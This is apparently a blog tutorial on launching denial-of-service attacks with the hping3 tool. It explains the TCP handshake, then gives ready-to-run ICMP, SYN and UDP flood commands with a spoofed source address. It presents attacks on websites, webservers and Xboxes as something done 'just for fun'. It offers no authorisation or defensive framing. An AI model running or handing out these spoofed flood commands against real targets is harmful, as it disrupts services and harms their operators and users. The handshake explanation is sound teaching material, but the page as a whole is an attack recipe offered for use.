Never Ending Security

It starts all here

How To DOS Attacks with Hping3


You guys would be very familiar with the term DOS Attack, it abbreviates for (Denial Of service). A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic.

These are of various types including Teardrop, ICMP Flooding, SYN Flood, etc. Also many times you would have opened multiple terminals and typed in “ping” to attack any site or IP, that was an ICMP flooding.

These attacks are implemented on various sites, webservers, XBoxes, etc for various purposes like bringing them down or just for fun.

TCP/IP Basics:

Before we implement this attack let us understand the basics of TCP/IP, especially how a connection is established. This will help us to implement better attack techniques. The process of establishment of a successful connection is termed as THREE-WAY-HANDSHAKE. Let us understand this with a simple example.

Let us assume a client and a server. Suppose client wants some data from server, for that he needs to establish a connection , so in order to do that :

  1. Client sends SYN packet to Server
  2. Server responds with SYN+ACK packet
  3. Clients sends ACK packet
  4. Connection Established )

DoS Attack With hping3

SYN = SYNchronize (Initiate a connection)
ACK = ACKnowledgement (Acknowledge client that the SYN was received)

Now since a connection is established they can transfer data easily.

So since you understood the handshake method (i hope) now we can execute a DOS attack that would be more powerful than simple ping attacks.

Tools Required:

As the title said it, all u need is hping3 installed. That would be installed by default in Kali or any other pentesting OS.

What Is hPing3:

As per the man page: hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated
under supported protocols. Using hping3 you are able to perform at least the following stuff.


Though hping3 offers wide variety of options, here we r gonna use few of them including :

  • –flood : Sent packets as fast as possible, without taking care to show incoming
  • replies.
  • -I : Interface to use (used if u r connected to multiple interfaces else optional)
  • -1 : ICMP mode
  • -2 : UDP mode
  • -a : Fake Hostname
  • -p : Destination port
  • -S : Set the SYN flag

DoS Attack With hping3: Usage:

hping3 [options] IP

You can see the results by capturing the packets from wireshark, but this could even hang or crash your wireshark. It is very similar to tools like HOIC and LOIC, but way too powerful !

Fun Begins:

So if u wanna flood the IP x.x.x.x with ping requests originating from IP y.y.y.y type

# hping3 -1 --flood -a y.y.y.y x.x.x.x

Similarly if u wanna flood the IP x.x.x.x on port 80 with SYN requests from fake IP y.y.y.y, type

# hping3 -S -a y.y.y.y --flood -p 80 x.x.x.x

This will send multiple SYN requests to port 80(http) and the victim will reply with SYN+ACK, now since the IP y.y.y.y is fake hence the connection will never establish, thus exhausting the victims bandwidth and resources.

BY DEFAULT hping3 attacks on TCP ports, to change it to UDP just use -2 option.

# hping3 --flood -a y.y.y.y -2 -p 6234 x.x.x.x

The above command will send UDP flood packets to x.x.x.x on port 6234 that would seem
to originate from y.y.y.y

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s